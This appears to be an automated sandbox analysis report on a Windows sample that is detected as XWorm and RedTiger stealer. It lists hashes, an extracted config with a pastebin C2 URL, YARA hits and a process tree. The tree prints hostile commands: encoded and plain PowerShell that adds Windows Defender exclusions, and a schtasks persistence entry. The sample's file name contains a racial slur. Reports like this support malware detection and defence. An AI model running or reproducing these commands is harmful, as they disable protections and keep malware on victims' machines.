Analysis
-
max time kernel
8s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-01-2025 00:12
Behavioral task
behavioral1
Sample
niggacoin.exe
Resource
win7-20240903-en
General
-
Target
niggacoin.exe
-
Size
3.6MB
-
MD5
765acfef2d7e2ef70720849522e0faeb
-
SHA1
e0432c262256d542359b3736362c1ed259915c54
-
SHA256
203209dc760b42b540e871713f2b65210e7e7cbf815493b170722b93e4f7a58f
-
SHA512
9266517309bd6491e4eaa24ed79edff7f37ed783957d1934c7748718d9c3d710636a36661a7f206590ba77a57d946ab852ba633ac8c645a2c35208c8fbfa9ad6
-
SSDEEP
98304:4y6ViOKz/eToA4cUJ4xMbDGDAyFGUPn68ufhPZS:h6VFKz2ToAINP8AyFvZAh8
Malware Config
Extracted
xworm
5.0
W0dvRoDKJr1YA1AA
-
Install_directory
%AppData%
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/fSgk0zpE
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000c000000023b42-4.dat family_xworm behavioral2/memory/4968-12-0x00000000002F0000-0x000000000031E000-memory.dmp family_xworm -
Detects RedTiger Stealer 64 IoCs
resource yara_rule behavioral2/files/0x000c000000023b42-4.dat redtigerv122 behavioral2/files/0x000c000000023b42-4.dat redtigerv22 behavioral2/files/0x000c000000023b42-4.dat redtiger_stealer_detection behavioral2/files/0x000c000000023b42-4.dat redtiger_stealer_detection_v2 behavioral2/files/0x000c000000023b42-4.dat staticSred behavioral2/files/0x000c000000023b42-4.dat staticred behavioral2/files/0x000c000000023b42-4.dat redtiger_stealer_detection_v1 behavioral2/memory/4968-12-0x00000000002F0000-0x000000000031E000-memory.dmp redtigerv122 behavioral2/memory/4968-12-0x00000000002F0000-0x000000000031E000-memory.dmp redtigerv22 behavioral2/memory/4968-12-0x00000000002F0000-0x000000000031E000-memory.dmp redtiger_stealer_detection behavioral2/memory/4968-12-0x00000000002F0000-0x000000000031E000-memory.dmp redtiger_stealer_detection_v2 behavioral2/memory/4968-12-0x00000000002F0000-0x000000000031E000-memory.dmp staticSred behavioral2/memory/4968-12-0x00000000002F0000-0x000000000031E000-memory.dmp staticred behavioral2/memory/4968-12-0x00000000002F0000-0x000000000031E000-memory.dmp redtiger_stealer_detection_v1 behavioral2/memory/3392-14-0x0000000003210000-0x0000000003246000-memory.dmp redtigerv122 behavioral2/memory/3392-14-0x0000000003210000-0x0000000003246000-memory.dmp redtigerv22 behavioral2/memory/3392-14-0x0000000003210000-0x0000000003246000-memory.dmp redtiger_stealer_detection behavioral2/memory/3392-14-0x0000000003210000-0x0000000003246000-memory.dmp redtiger_stealer_detection_v2 behavioral2/memory/3392-14-0x0000000003210000-0x0000000003246000-memory.dmp staticSred behavioral2/memory/3392-14-0x0000000003210000-0x0000000003246000-memory.dmp staticred behavioral2/memory/3392-14-0x0000000003210000-0x0000000003246000-memory.dmp redtiger_stealer_detection_v1 behavioral2/memory/1864-15-0x00000000051E0000-0x0000000005808000-memory.dmp redtigerv122 behavioral2/memory/1864-15-0x00000000051E0000-0x0000000005808000-memory.dmp redtigerv22 behavioral2/memory/1864-15-0x00000000051E0000-0x0000000005808000-memory.dmp redtiger_stealer_detection behavioral2/memory/1864-15-0x00000000051E0000-0x0000000005808000-memory.dmp redtiger_stealer_detection_v2 behavioral2/memory/1864-15-0x00000000051E0000-0x0000000005808000-memory.dmp staticSred behavioral2/memory/1864-15-0x00000000051E0000-0x0000000005808000-memory.dmp staticred behavioral2/memory/1864-15-0x00000000051E0000-0x0000000005808000-memory.dmp redtiger_stealer_detection_v1 behavioral2/memory/3392-17-0x0000000005800000-0x0000000005822000-memory.dmp redtigerv122 behavioral2/memory/3392-17-0x0000000005800000-0x0000000005822000-memory.dmp redtigerv22 behavioral2/memory/3392-17-0x0000000005800000-0x0000000005822000-memory.dmp redtiger_stealer_detection behavioral2/memory/3392-17-0x0000000005800000-0x0000000005822000-memory.dmp redtiger_stealer_detection_v2 behavioral2/memory/3392-17-0x0000000005800000-0x0000000005822000-memory.dmp staticSred behavioral2/memory/3392-17-0x0000000005800000-0x0000000005822000-memory.dmp staticred behavioral2/memory/3392-17-0x0000000005800000-0x0000000005822000-memory.dmp redtiger_stealer_detection_v1 behavioral2/memory/3392-18-0x0000000006110000-0x0000000006176000-memory.dmp redtigerv122 behavioral2/memory/3392-18-0x0000000006110000-0x0000000006176000-memory.dmp redtigerv22 behavioral2/memory/3392-18-0x0000000006110000-0x0000000006176000-memory.dmp redtiger_stealer_detection behavioral2/memory/3392-18-0x0000000006110000-0x0000000006176000-memory.dmp redtiger_stealer_detection_v2 behavioral2/memory/3392-18-0x0000000006110000-0x0000000006176000-memory.dmp staticSred behavioral2/memory/3392-18-0x0000000006110000-0x0000000006176000-memory.dmp staticred behavioral2/memory/3392-18-0x0000000006110000-0x0000000006176000-memory.dmp redtiger_stealer_detection_v1 behavioral2/memory/3392-19-0x0000000006180000-0x00000000061E6000-memory.dmp redtigerv122 behavioral2/memory/3392-19-0x0000000006180000-0x00000000061E6000-memory.dmp redtigerv22 behavioral2/memory/3392-19-0x0000000006180000-0x00000000061E6000-memory.dmp redtiger_stealer_detection behavioral2/memory/3392-19-0x0000000006180000-0x00000000061E6000-memory.dmp redtiger_stealer_detection_v2 behavioral2/memory/3392-19-0x0000000006180000-0x00000000061E6000-memory.dmp staticSred behavioral2/memory/3392-19-0x0000000006180000-0x00000000061E6000-memory.dmp staticred behavioral2/memory/3392-19-0x0000000006180000-0x00000000061E6000-memory.dmp redtiger_stealer_detection_v1 behavioral2/memory/1864-37-0x0000000005BA0000-0x0000000005EF4000-memory.dmp redtigerv122 behavioral2/memory/1864-37-0x0000000005BA0000-0x0000000005EF4000-memory.dmp redtigerv22 behavioral2/memory/1864-37-0x0000000005BA0000-0x0000000005EF4000-memory.dmp redtiger_stealer_detection behavioral2/memory/1864-37-0x0000000005BA0000-0x0000000005EF4000-memory.dmp redtiger_stealer_detection_v2 behavioral2/memory/1864-37-0x0000000005BA0000-0x0000000005EF4000-memory.dmp staticSred behavioral2/memory/1864-37-0x0000000005BA0000-0x0000000005EF4000-memory.dmp staticred behavioral2/memory/1864-37-0x0000000005BA0000-0x0000000005EF4000-memory.dmp redtiger_stealer_detection_v1 behavioral2/memory/1864-59-0x0000000006080000-0x000000000609E000-memory.dmp redtigerv122 behavioral2/memory/1864-59-0x0000000006080000-0x000000000609E000-memory.dmp redtigerv22 behavioral2/memory/1864-59-0x0000000006080000-0x000000000609E000-memory.dmp redtiger_stealer_detection behavioral2/memory/1864-59-0x0000000006080000-0x000000000609E000-memory.dmp redtiger_stealer_detection_v2 behavioral2/memory/1864-59-0x0000000006080000-0x000000000609E000-memory.dmp staticSred behavioral2/memory/1864-59-0x0000000006080000-0x000000000609E000-memory.dmp staticred behavioral2/memory/1864-59-0x0000000006080000-0x000000000609E000-memory.dmp redtiger_stealer_detection_v1 behavioral2/memory/1864-60-0x00000000065E0000-0x000000000662C000-memory.dmp redtigerv122 -
Redtiger family
-
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1704 powershell.exe 6708 powershell.exe 6472 powershell.exe 4600 powershell.exe -
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation niggacoin.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation niggacoin.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation niggacoin.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation niggacoin.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation niggacoin.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation niggacoin.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation niggacoin.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation niggacoin.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation niggacoin.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation niggacoin.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation niggacoin.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation niggacoin.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation niggacoin.exe -
Executes dropped EXE 13 IoCs
pid Process 4968 msedge.exe 1876 msedge.exe 2192 msedge.exe 5080 msedge.exe 4836 msedge.exe 116 msedge.exe 1196 msedge.exe 1568 msedge.exe 1972 msedge.exe 2464 msedge.exe 2268 msedge.exe 1516 msedge.exe 3500 msedge.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 21 IoCs
flow ioc 54 pastebin.com 61 pastebin.com 64 pastebin.com 40 pastebin.com 55 pastebin.com 56 pastebin.com 58 pastebin.com 63 pastebin.com 62 pastebin.com 65 pastebin.com 66 pastebin.com 39 pastebin.com 43 pastebin.com 48 pastebin.com 57 pastebin.com 59 pastebin.com 60 pastebin.com 67 pastebin.com 68 pastebin.com 69 pastebin.com 70 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 25 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language niggacoin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language niggacoin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language niggacoin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language niggacoin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language niggacoin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language niggacoin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language niggacoin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language niggacoin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language niggacoin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language niggacoin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language niggacoin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language niggacoin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language niggacoin.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2788 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid Process 3392 powershell.exe 1864 powershell.exe 4168 powershell.exe 1864 powershell.exe 2848 powershell.exe 3392 powershell.exe 4168 powershell.exe 620 powershell.exe 620 powershell.exe 2848 powershell.exe 2848 powershell.exe 3860 powershell.exe 3860 powershell.exe 4524 powershell.exe 4524 powershell.exe 620 powershell.exe 4524 powershell.exe 3860 powershell.exe 4744 powershell.exe 4744 powershell.exe 3624 powershell.exe 3624 powershell.exe 3400 powershell.exe 3400 powershell.exe 4744 powershell.exe 2212 powershell.exe 2212 powershell.exe 3624 powershell.exe 4940 powershell.exe 4940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 4968 msedge.exe Token: SeDebugPrivilege 1876 msedge.exe Token: SeDebugPrivilege 1864 powershell.exe Token: SeDebugPrivilege 3392 powershell.exe Token: SeDebugPrivilege 2192 msedge.exe Token: SeDebugPrivilege 4168 powershell.exe Token: SeDebugPrivilege 5080 msedge.exe Token: SeDebugPrivilege 2848 powershell.exe Token: SeDebugPrivilege 4836 msedge.exe Token: SeDebugPrivilege 620 powershell.exe Token: SeDebugPrivilege 116 msedge.exe Token: SeDebugPrivilege 1196 msedge.exe Token: SeDebugPrivilege 4524 powershell.exe Token: SeDebugPrivilege 3860 powershell.exe Token: SeDebugPrivilege 1568 msedge.exe Token: SeDebugPrivilege 1972 msedge.exe Token: SeDebugPrivilege 4744 powershell.exe Token: SeDebugPrivilege 2464 msedge.exe Token: SeDebugPrivilege 3624 powershell.exe Token: SeDebugPrivilege 2268 msedge.exe Token: SeDebugPrivilege 3400 powershell.exe Token: SeDebugPrivilege 1516 msedge.exe Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 4940 powershell.exe Token: SeDebugPrivilege 3500 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1804 wrote to memory of 3392 1804 niggacoin.exe 82 PID 1804 wrote to memory of 3392 1804 niggacoin.exe 82 PID 1804 wrote to memory of 3392 1804 niggacoin.exe 82 PID 1804 wrote to memory of 4968 1804 niggacoin.exe 84 PID 1804 wrote to memory of 4968 1804 niggacoin.exe 84 PID 1804 wrote to memory of 4720 1804 niggacoin.exe 85 PID 1804 wrote to memory of 4720 1804 niggacoin.exe 85 PID 1804 wrote to memory of 4720 1804 niggacoin.exe 85 PID 4720 wrote to memory of 1864 4720 niggacoin.exe 86 PID 4720 wrote to memory of 1864 4720 niggacoin.exe 86 PID 4720 wrote to memory of 1864 4720 niggacoin.exe 86 PID 4720 wrote to memory of 1876 4720 niggacoin.exe 88 PID 4720 wrote to memory of 1876 4720 niggacoin.exe 88 PID 4720 wrote to memory of 1124 4720 niggacoin.exe 89 PID 4720 wrote to memory of 1124 4720 niggacoin.exe 89 PID 4720 wrote to memory of 1124 4720 niggacoin.exe 89 PID 1124 wrote to memory of 4168 1124 niggacoin.exe 90 PID 1124 wrote to memory of 4168 1124 niggacoin.exe 90 PID 1124 wrote to memory of 4168 1124 niggacoin.exe 90 PID 1124 wrote to memory of 2192 1124 niggacoin.exe 92 PID 1124 wrote to memory of 2192 1124 niggacoin.exe 92 PID 1124 wrote to memory of 4988 1124 niggacoin.exe 142 PID 1124 wrote to memory of 4988 1124 niggacoin.exe 142 PID 1124 wrote to memory of 4988 1124 niggacoin.exe 142 PID 4988 wrote to memory of 2848 4988 niggacoin.exe 94 PID 4988 wrote to memory of 2848 4988 niggacoin.exe 94 PID 4988 wrote to memory of 2848 4988 niggacoin.exe 94 PID 4988 wrote to memory of 5080 4988 niggacoin.exe 96 PID 4988 wrote to memory of 5080 4988 niggacoin.exe 96 PID 4988 wrote to memory of 4024 4988 niggacoin.exe 97 PID 4988 wrote to memory of 4024 4988 niggacoin.exe 97 PID 4988 wrote to memory of 4024 4988 niggacoin.exe 97 PID 4024 wrote to memory of 620 4024 niggacoin.exe 98 PID 4024 wrote to memory of 620 4024 niggacoin.exe 98 PID 4024 wrote to memory of 620 4024 niggacoin.exe 98 PID 4024 wrote to memory of 4836 4024 niggacoin.exe 99 PID 4024 wrote to memory of 4836 4024 niggacoin.exe 99 PID 4024 wrote to memory of 1536 4024 niggacoin.exe 100 PID 4024 wrote to memory of 1536 4024 niggacoin.exe 100 PID 4024 wrote to memory of 1536 4024 niggacoin.exe 100 PID 1536 wrote to memory of 4524 1536 niggacoin.exe 237 PID 1536 wrote to memory of 4524 1536 niggacoin.exe 237 PID 1536 wrote to memory of 4524 1536 niggacoin.exe 237 PID 1536 wrote to memory of 116 1536 niggacoin.exe 103 PID 1536 wrote to memory of 116 1536 niggacoin.exe 103 PID 1536 wrote to memory of 3976 1536 niggacoin.exe 104 PID 1536 wrote to memory of 3976 1536 niggacoin.exe 104 PID 1536 wrote to memory of 3976 1536 niggacoin.exe 104 PID 3976 wrote to memory of 3860 3976 niggacoin.exe 106 PID 3976 wrote to memory of 3860 3976 niggacoin.exe 106 PID 3976 wrote to memory of 3860 3976 niggacoin.exe 106 PID 3976 wrote to memory of 1196 3976 niggacoin.exe 331 PID 3976 wrote to memory of 1196 3976 niggacoin.exe 331 PID 3976 wrote to memory of 4768 3976 niggacoin.exe 187 PID 3976 wrote to memory of 4768 3976 niggacoin.exe 187 PID 3976 wrote to memory of 4768 3976 niggacoin.exe 187 PID 4768 wrote to memory of 4744 4768 niggacoin.exe 110 PID 4768 wrote to memory of 4744 4768 niggacoin.exe 110 PID 4768 wrote to memory of 4744 4768 niggacoin.exe 110 PID 4768 wrote to memory of 1568 4768 niggacoin.exe 111 PID 4768 wrote to memory of 1568 4768 niggacoin.exe 111 PID 4768 wrote to memory of 1084 4768 niggacoin.exe 113 PID 4768 wrote to memory of 1084 4768 niggacoin.exe 113 PID 4768 wrote to memory of 1084 4768 niggacoin.exe 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3392
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:4600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:1704 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1048
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge'3⤵
- Command and Scripting Interpreter: PowerShell
PID:6708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge'3⤵
- Command and Scripting Interpreter: PowerShell
PID:6472
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Roaming\msedge"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2788
-
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:620
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4836
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:116
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3860
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4768 -
